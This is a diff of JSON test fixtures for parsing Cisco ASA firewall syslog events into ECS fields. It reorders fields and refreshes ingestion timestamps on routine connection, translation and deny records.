@@ -6157,25 +6154,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6185,12 +6179,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995182500Z", + "ingested": "2021-12-14T14:38:25.938814067Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30", "code": "305012", "kind": "event", @@ -6204,25 +6201,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6232,12 +6226,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995187600Z", + "ingested": "2021-12-14T14:38:25.938814830Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30", "code": "305012", "kind": "event", 
@@ -6251,25 +6248,22 @@ }, "cisco": { "asa": {} - } - }, - { - "process": { - "name": "CiscoASA", - "pid": 999 - }, - "log": { - "level": "informational" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "localhost", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "CiscoASA", + "pid": 999 + }, "@timestamp": "2018-10-10T12:34:56.000Z", "ecs": { "version": "1.12.0" @@ -6279,12 +6273,15 @@ "localhost" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "localhost" }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995193Z", + "ingested": "2021-12-14T14:38:25.938815884Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30", "code": "305012", "kind": "event", @@ -6298,7 +6295,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { @@ -6362,7 +6362,7 @@ "severity": 6, "duration": 325000000000, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995197700Z", + "ingested": "2021-12-14T14:38:25.938838301Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs", "code": "302014", "kind": "event", @@ -6447,7 +6447,7 @@ "severity": 6, "duration": 0, "reason": "TCP Reset-I", - "ingested": "2021-12-09T13:33:41.995203100Z", + "ingested": "2021-12-14T14:38:25.938841062Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I", "code": "302014", "kind": "event", 
@@ -6529,7 +6529,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995209500Z", + "ingested": "2021-12-14T14:38:25.938841594Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278", "code": "305011", "kind": "event", @@ -6608,7 +6608,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995215800Z", + "ingested": "2021-12-14T14:38:25.938842082Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)", "code": "302013", "kind": "event", @@ -6691,7 +6691,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995222500Z", + "ingested": "2021-12-14T14:38:25.938842533Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6772,7 +6772,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995229300Z", + "ingested": "2021-12-14T14:38:25.938843089Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -6853,7 +6853,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995235600Z", + "ingested": "2021-12-14T14:38:25.938843759Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -6934,7 +6934,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995241900Z", + "ingested": "2021-12-14T14:38:25.938844226Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7015,7 +7015,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995248200Z", + "ingested": "2021-12-14T14:38:25.938844781Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7096,7 +7096,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995254300Z", + "ingested": "2021-12-14T14:38:25.938845243Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7177,7 +7177,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995260900Z", + "ingested": "2021-12-14T14:38:25.938845717Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7258,7 +7258,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995267200Z", + "ingested": "2021-12-14T14:38:25.938846258Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7339,7 +7339,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995273600Z", + "ingested": "2021-12-14T14:38:25.938847270Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7420,7 +7420,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995280Z", + "ingested": "2021-12-14T14:38:25.938847845Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7501,7 +7501,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995287300Z", + "ingested": "2021-12-14T14:38:25.938848310Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7582,7 +7582,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995291600Z", + "ingested": "2021-12-14T14:38:25.938848827Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -7663,7 +7663,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.995296600Z", + "ingested": "2021-12-14T14:38:25.938849293Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -7744,7 +7744,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995303600Z", + "ingested": "2021-12-14T14:38:25.938849857Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", @@ -7823,7 +7823,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995310200Z", + "ingested": "2021-12-14T14:38:25.938850481Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", @@ -7906,7 +7906,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995314700Z", + "ingested": "2021-12-14T14:38:25.938850946Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", @@ -7985,7 +7985,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995319900Z", + "ingested": "2021-12-14T14:38:25.938851412Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8070,7 +8070,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995326200Z", + "ingested": "2021-12-14T14:38:25.938851883Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", 
@@ -8153,7 +8153,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995331100Z", + "ingested": "2021-12-14T14:38:25.938852532Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -8238,7 +8238,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995372700Z", + "ingested": "2021-12-14T14:38:25.938853199Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", @@ -8320,7 +8320,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995380500Z", + "ingested": "2021-12-14T14:38:25.938853672Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", @@ -8399,7 +8399,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995385500Z", + "ingested": "2021-12-14T14:38:25.938854224Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", @@ -8482,7 +8482,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995390700Z", + "ingested": "2021-12-14T14:38:25.938854692Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", 
@@ -8561,7 +8561,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995397100Z", + "ingested": "2021-12-14T14:38:25.938855253Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", @@ -8647,7 +8647,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995403400Z", + "ingested": "2021-12-14T14:38:25.938855796Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", @@ -8729,7 +8729,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995409700Z", + "ingested": "2021-12-14T14:38:25.938856945Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", @@ -8808,7 +8808,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995416Z", + "ingested": "2021-12-14T14:38:25.938857471Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", @@ -8894,7 +8894,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995422500Z", + "ingested": "2021-12-14T14:38:25.938858487Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", 
@@ -8976,7 +8976,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995428900Z", + "ingested": "2021-12-14T14:38:25.938858969Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", @@ -9055,7 +9055,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995435100Z", + "ingested": "2021-12-14T14:38:25.938859496Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", @@ -9141,7 +9141,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995441300Z", + "ingested": "2021-12-14T14:38:25.938860134Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", @@ -9226,7 +9226,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995447700Z", + "ingested": "2021-12-14T14:38:25.938860596Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", @@ -9308,7 +9308,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995454100Z", + "ingested": "2021-12-14T14:38:25.938861065Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", 
@@ -9387,7 +9387,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995460400Z", + "ingested": "2021-12-14T14:38:25.938861528Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", @@ -9473,7 +9473,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995465Z", + "ingested": "2021-12-14T14:38:25.938861997Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", @@ -9555,7 +9555,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995470400Z", + "ingested": "2021-12-14T14:38:25.938906543Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285", "code": "305011", "kind": "event", @@ -9634,7 +9634,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995475600Z", + "ingested": "2021-12-14T14:38:25.938937071Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)", "code": "302013", "kind": "event", @@ -9717,7 +9717,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995482100Z", + "ingested": "2021-12-14T14:38:25.938941025Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286", "code": "305011", "kind": "event", 
@@ -9796,7 +9796,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995486500Z", + "ingested": "2021-12-14T14:38:25.938941913Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)", "code": "302013", "kind": "event", @@ -9879,7 +9879,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995491300Z", + "ingested": "2021-12-14T14:38:25.938942667Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287", "code": "305011", "kind": "event", @@ -9958,7 +9958,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995495800Z", + "ingested": "2021-12-14T14:38:25.938943369Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)", "code": "302013", "kind": "event", @@ -10041,7 +10041,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995500500Z", + "ingested": "2021-12-14T14:38:25.938944285Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288", "code": "305011", "kind": "event", @@ -10120,7 +10120,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995505500Z", + "ingested": "2021-12-14T14:38:25.938945136Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)", "code": "302013", "kind": "event", 
@@ -10206,7 +10206,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995509700Z", + "ingested": "2021-12-14T14:38:25.938945955Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:192.168.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs", "code": "302014", "kind": "event", @@ -10291,7 +10291,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995515200Z", + "ingested": "2021-12-14T14:38:25.938946655Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:192.168.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs", "code": "302014", "kind": "event", @@ -10376,7 +10376,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995521400Z", + "ingested": "2021-12-14T14:38:25.938947347Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:192.168.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs", "code": "302014", "kind": "event", @@ -10458,7 +10458,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995526700Z", + "ingested": "2021-12-14T14:38:25.938948191Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289", "code": "305011", "kind": "event", @@ -10537,7 +10537,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995532Z", + "ingested": "2021-12-14T14:38:25.938949200Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)", "code": "302013", "kind": "event", 
@@ -10620,7 +10620,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995537700Z", + "ingested": "2021-12-14T14:38:25.938949871Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290", "code": "305011", "kind": "event", @@ -10699,7 +10699,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995542900Z", + "ingested": "2021-12-14T14:38:25.938950593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)", "code": "302013", "kind": "event", @@ -10785,7 +10785,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995548300Z", + "ingested": "2021-12-14T14:38:25.938951339Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:192.168.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs", "code": "302014", "kind": "event", @@ -10867,7 +10867,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995554700Z", + "ingested": "2021-12-14T14:38:25.938952040Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291", "code": "305011", "kind": "event", @@ -10946,7 +10946,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995561100Z", + "ingested": "2021-12-14T14:38:25.938952918Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)", "code": "302013", "kind": "event", 
@@ -11032,7 +11032,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995567600Z", + "ingested": "2021-12-14T14:38:25.938953467Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:192.168.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs", "code": "302014", "kind": "event", @@ -11117,7 +11117,7 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-12-09T13:33:41.995573800Z", + "ingested": "2021-12-14T14:38:25.938953954Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:192.168.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs", "code": "302014", "kind": "event", @@ -11200,7 +11200,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995580400Z", + "ingested": "2021-12-14T14:38:25.938954418Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:192.168.100.107/53 (192.168.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11283,7 +11283,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995586500Z", + "ingested": "2021-12-14T14:38:25.938955003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292", "code": "305011", "kind": "event", @@ -11362,7 +11362,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995592800Z", + "ingested": "2021-12-14T14:38:25.938955469Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)", "code": "302013", "kind": "event", 
@@ -11447,7 +11447,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995599Z", + "ingested": "2021-12-14T14:38:25.938956088Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:192.168.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384", "code": "302016", "kind": "event", @@ -11530,7 +11530,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995605200Z", + "ingested": "2021-12-14T14:38:25.938956589Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:192.168.104.8/53 (192.168.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", @@ -11615,7 +11615,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:41.995610700Z", + "ingested": "2021-12-14T14:38:25.938957069Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:192.168.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94", "code": "302016", "kind": "event", @@ -11697,7 +11697,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995614500Z", + "ingested": "2021-12-14T14:38:25.938957536Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:192.168.98.44/8293", "code": "305011", "kind": "event", @@ -11776,7 +11776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.995619400Z", + "ingested": "2021-12-14T14:38:25.938958002Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:192.168.123.191/80 (192.168.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)", "code": "302013", "kind": "event", 
